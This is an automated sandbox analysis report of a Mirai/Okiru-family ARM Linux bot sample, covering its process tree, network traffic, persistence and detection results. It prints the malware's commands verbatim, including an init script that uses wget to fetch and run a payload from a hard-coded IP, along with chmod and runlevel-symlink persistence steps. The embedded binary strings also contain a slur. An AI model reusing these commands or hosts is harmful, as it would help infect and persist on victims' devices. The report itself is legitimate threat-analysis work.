Edit tour

Linux Analysis Report
arm.nn-20241224-0652.elf

Overview

General Information

Sample name:	arm.nn-20241224-0652.elf
Analysis ID:	1580256
MD5:	03ead7aeb51e3e00a6bd3a4a522f8aad
SHA1:	bb9612690457e0a31bd0e56187b06c1eac629d9c
SHA256:	1636d1bf8a651852f8a808137b2648529c297115039ed4f4f4f85e7d0494710c
Tags:	user-elfdigest
Infos:

Detection

Okiru

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580256
Start date and time:	2024-12-24 07:53:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm.nn-20241224-0652.elf
Detection:	MAL
Classification:	mal80.spre.troj.evad.linELF@0/10@2/0

Runtime Messages

Command:	/tmp/arm.nn-20241224-0652.elf
PID:	5409
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

arm.nn-20241224-0652.elf (PID: 5409, Parent: 5335, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.nn-20241224-0652.elf

arm.nn-20241224-0652.elf New Fork (PID: 5426, Parent: 5409)

sh (PID: 5426, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 5438, Parent: 5426)

systemctl (PID: 5438, Parent: 5426, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

arm.nn-20241224-0652.elf New Fork (PID: 5454, Parent: 5409)

sh (PID: 5454, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 5456, Parent: 5454)

chmod (PID: 5456, Parent: 5454, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

arm.nn-20241224-0652.elf New Fork (PID: 5457, Parent: 5409)

sh (PID: 5457, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 5459, Parent: 5457)

ln (PID: 5459, Parent: 5457, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

arm.nn-20241224-0652.elf New Fork (PID: 5460, Parent: 5409)

sh (PID: 5460, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn-20241224-0652.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn-20241224-0652.elf'\n /tmp/arm.nn-20241224-0652.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn-20241224-0652.elf'\n killall arm.nn-20241224-0652.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn-20241224-0652.elf"

arm.nn-20241224-0652.elf New Fork (PID: 5462, Parent: 5409)

sh (PID: 5462, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/arm.nn-20241224-0652.elf >/dev/null 2>&1"

sh New Fork (PID: 5464, Parent: 5462)

chmod (PID: 5464, Parent: 5462, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/arm.nn-20241224-0652.elf

arm.nn-20241224-0652.elf New Fork (PID: 5465, Parent: 5409)

sh (PID: 5465, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 5467, Parent: 5465)

mkdir (PID: 5467, Parent: 5465, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

arm.nn-20241224-0652.elf New Fork (PID: 5469, Parent: 5409)

sh (PID: 5469, Parent: 5409, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/arm.nn-20241224-0652.elf /etc/rc.d/S99arm.nn-20241224-0652.elf >/dev/null 2>&1"

sh New Fork (PID: 5471, Parent: 5469)

ln (PID: 5471, Parent: 5469, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/arm.nn-20241224-0652.elf /etc/rc.d/S99arm.nn-20241224-0652.elf

arm.nn-20241224-0652.elf New Fork (PID: 5472, Parent: 5409)

arm.nn-20241224-0652.elf New Fork (PID: 5476, Parent: 5472)

udisksd New Fork (PID: 5420, Parent: 802)

dumpe2fs (PID: 5420, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5449, Parent: 5448)

snapd-env-generator (PID: 5449, Parent: 5448, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5487, Parent: 802)

dumpe2fs (PID: 5487, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5541, Parent: 802)

dumpe2fs (PID: 5541, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
arm.nn-20241224-0652.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5409.1.00007f3838017000.00007f383802d000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: arm.nn-20241224-0652.elf PID: 5409	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: arm.nn-20241224-0652.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: arm.nn-20241224-0652.elf

ReversingLabs: Detection: 28%

Source: arm.nn-20241224-0652.elf

String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.13:44548 -> 94.156.227.234:38242

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: arm.nn-20241224-0652.elf, profile.12.dr, system.12.dr, inittab.12.dr, arm.nn-20241224-0652.elf.30.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.233/
Source: arm.nn-20241224-0652.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal80.spre.troj.evad.linELF@0/10@2/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5459)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 5471)	File: /etc/rc.d/S99arm.nn-20241224-0652.elf -> /etc/init.d/arm.nn-20241224-0652.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5456)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5464)	File: /etc/init.d/arm.nn-20241224-0652.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5580/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5581/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5560/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5582/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5561/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5583/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5584/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5585/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5586/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5587/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5519/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5511/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5577/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5512/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5578/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5513/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5579/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5514/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5515/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5516/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5517/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5518/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5591/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5592/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5593/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5594/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5595/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5255/cmdline	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5596/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5510/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5590/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5508/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5509/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5588/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5501/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5589/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5502/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5503/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5504/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5505/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5506/status	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5476)	File opened: /proc/5507/status	Jump to behavior

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5426)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5454)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5457)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5460)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn-20241224-0652.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn-20241224-0652.elf'\n /tmp/arm.nn-20241224-0652.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn-20241224-0652.elf'\n killall arm.nn-20241224-0652.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn-20241224-0652.elf"	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5462)	Shell command executed: sh -c "chmod +x /etc/init.d/arm.nn-20241224-0652.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5465)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5469)	Shell command executed: sh -c "ln -s /etc/init.d/arm.nn-20241224-0652.elf /etc/rc.d/S99arm.nn-20241224-0652.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 5456)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 5464)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/arm.nn-20241224-0652.elf			Jump to behavior

Source: /bin/sh (PID: 5467)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 5438)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5456)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5464)	File: /etc/init.d/arm.nn-20241224-0652.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5460)	Writes shell script file to disk with an unusual file extension: /etc/init.d/arm.nn-20241224-0652.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 5460)	File: /etc/init.d/arm.nn-20241224-0652.elf			Jump to dropped file

Source: /tmp/arm.nn-20241224-0652.elf (PID: 5409)

Queries kernel information via 'uname':

Jump to behavior

Source: arm.nn-20241224-0652.elf, 5409.1.00007fff3a6c6000.00007fff3a6e7000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.GmV2rd
Source: arm.nn-20241224-0652.elf, 5409.1.000055ebff03f000.000055ebff18e000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/usrQ
Source: arm.nn-20241224-0652.elf, 5409.1.000055ebff03f000.000055ebff18e000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm.nn-20241224-0652.elf, 5409.1.000055ebff03f000.000055ebff18e000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: arm.nn-20241224-0652.elf, 5409.1.000055ebff03f000.000055ebff18e000.rw-.sdmp	Binary or memory string: U/arm/sr/bin0!/usr/bin/VGAuthService1/proc/3212/exe/arm/sr10!/usr/libexec/ibus-x11!/proc/727/exe1/etc/rc.confU/arm/10!/proc/1751/exe0!/usr/bin/vmtoolsd1/usr/libexec/ibus-portal
Source: arm.nn-20241224-0652.elf, 5409.1.00007fff3a6c6000.00007fff3a6e7000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm.nn-20241224-0652.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.nn-20241224-0652.elf
Source: arm.nn-20241224-0652.elf, 5409.1.000055ebff03f000.000055ebff18e000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: arm.nn-20241224-0652.elf, 5409.1.00007fff3a6c6000.00007fff3a6e7000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: arm.nn-20241224-0652.elf, 5409.1.00007fff3a6c6000.00007fff3a6e7000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm.nn-20241224-0652.elf, 5409.1.00007fff3a6c6000.00007fff3a6e7000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.GmV2rd

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: arm.nn-20241224-0652.elf, type: SAMPLE
Source: Yara match	File source: 5409.1.00007f3838017000.00007f383802d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm.nn-20241224-0652.elf PID: 5409, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: arm.nn-20241224-0652.elf, type: SAMPLE
Source: Yara match	File source: 5409.1.00007f3838017000.00007f383802d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm.nn-20241224-0652.elf PID: 5409, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
arm.nn-20241224-0652.elf	29%	ReversingLabs	Linux.Backdoor.Mirai
arm.nn-20241224-0652.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs
/etc/rc.local	0%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.24	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	arm.nn-20241224-0652.elf	false		high
http://94.156.227.233/	arm.nn-20241224-0652.elf, profile.12.dr, system.12.dr, inittab.12.dr, arm.nn-20241224-0652.elf.30.dr, bootcmd.12.dr, custom.service.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.227.234	unknown	Bulgaria		57463	NETIXBG	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
94.156.227.234	mips.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
